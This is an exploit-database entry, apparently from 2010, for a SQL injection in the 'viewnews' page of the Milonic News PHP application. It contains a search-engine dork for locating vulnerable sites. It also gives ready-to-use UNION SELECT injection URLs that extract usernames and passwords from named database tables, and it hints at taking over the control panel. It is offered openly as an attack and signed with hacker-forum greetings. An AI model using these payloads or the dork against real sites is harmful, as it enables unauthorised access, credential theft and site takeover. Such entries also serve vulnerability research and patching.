Milonic News - 'viewnews' SQL Injection
Author: Err0R
type: webapps
platform: php
port:
date_added: 2010-01-05
date_updated:
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
=============================================================================
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-----------------------------------------------------------------------------
############################################################################
# (+) Title : Milonic News (viewnews) SQL Injection Vulnerability
# (+) Auther: Err0R
# (+) Site : http://sa-hacker.com/vb
# (+) Email : a5q(AT)hotmail(dot)com
############################################################################
-----------------------------------------------------------------------------
# (+) dork : intext:"powered by Milonic" inurl:viewnews.php?id=
-----------------------------------------------------------------------------
# (+) Exploit : /viewnews.php?ID=-136+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
Username :/viewnews.php?ID=-136+union+select+1,2,3,4,5,6,7,8,username,10,11,12,13,14+from+renewabl_mhpcompanies.experts--
Passoword: /viewnews.php?ID=-136+union+select+1,2,3,4,5,6,7,8,password,10,11,12,13,14+from+renewabl_mhpwebsite.users--
you come .. control panel
-----------------------------------------------------------------------------
# (+) Greetz To :-
===================================================+
all member in www.Sa-hacker.com/vb |
++++++++++++++++++++++++++++++++++++++++++++ |
Special To :Pepsi & Dr.X3 |
++++++++++++++++++++++++++++++++++++++++++++ |
===================================================+
-----------------------------------------------------------------------------
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++